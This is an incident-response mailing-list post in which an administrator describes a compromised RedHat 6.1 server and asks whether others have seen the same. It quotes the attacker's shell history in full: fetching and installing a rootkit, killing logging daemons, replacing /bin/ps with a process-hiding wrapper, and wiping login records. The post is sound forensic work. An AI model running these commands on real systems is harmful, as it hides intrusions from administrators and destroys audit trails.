Sloppy compromise

["switched" <security-mail () q-east net>]

I was dealing with a compromised server (RedHat 6.1) yesterday and it was
utter crap.  After logging into the server the first thing I did was cat
/etc/passwd.  At the bottom of /etc/passwd was the user "liq2" with a uid of
0.  Not so clean.  The user "liq" had a uid of 501 I believe.  Both users
had home directories in /home... so there was a /home/liq and /home/liq2.
/home/liq contained a program, along with source, that scanned /24's for
Cisco devices.  /home/liq2 had an untampered .bash_history with this in it:

wget http://home.dal.net/[-liquid-]/login.tgz; tar zfx login.tgz; cd login;
pico rk.h; ./configure; make; make install; cd ..; rm -rf login; cd
/home/liq; rm -rf login.tar.gz; wget (Link:
ftp://ftp.wuftpd.org/pub/wu-ftpd/wu-ftpd-2.6.2.tar.gz;)ftp://ftp.wuftpd.org/
pub/wu-ftpd/wu-ftpd-2.6.2.tar.gz; tar zxfv wu-ftpd-2.6.2.tar.gz; cd
wu-ftpd-2.6.2;./configure;make;make install; cd ..; rm -rf wu-ftpd-2.6.2;
rm -rf wu-ftpd-2.6.2.tar.gz; killall crond;killall syslogd;killall klogd;
mv -f /bin/ps /bin/xps; echo "xps \$*|grep -vi 'in.telnetd'|grep -vi
'grep'|sed s/'xps'/'ps'/g">/bin/ps; chown root.bin /bin/ps; chmod 0755
/bin/ps; rm -f /var/run/utmp /var/run/wtmp; touch /var/run/utmp
/var/run/wtmp; chmod 0 /var/run/utmp; chmod 0 /var/run/wtmp

Very very sloppy... But you can also see this in there...
mv -f /bin/ps /bin/xps; echo "xps \$*|grep -vi 'in.telnetd'|grep -vi
'grep'|sed s/'xps'/'ps'/g">/bin/ps

The attacker moved /bin/ps to /bin/xps and then echo'ed a script to ps which
removes in.telnetd from showing up and changes the name of xps to ps.  Yes
very crappy.  You have to be 2 years old to not catch that especially when
sed shows up in the process list everytime you type "ps".  Moving right
along I soon noticed I was on pty/2 but who showed me as the only user...
interesting...  Ok, I typed xps and noticed that "./wu" was running on
pty/1! Odd...  And then I noticed the system load average jump from .2 to
2.0!  Now I noticed that "./wu" wasn't running but "./pscan" was now
running.  At this point in time I decided enough was enough and had the
machine unplugged.  Later on I went to look at it again from the console and
noticed that these IPs had connected with telnet:

212.199.3.193
212.199.12.34
212.199.173.26

They also weren't smart enough to remove or alter anything in /var/log/ and
"last" showed them logging in with ftp and telnet! DOH! Further
investigating found "wu" and "pscan" in /tmp/.or/

So has anyone else seen a compromise such as this?  From what little
investigating I did this is all I found modified... Looks like script
kiddies were at work ;).

-switched




----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com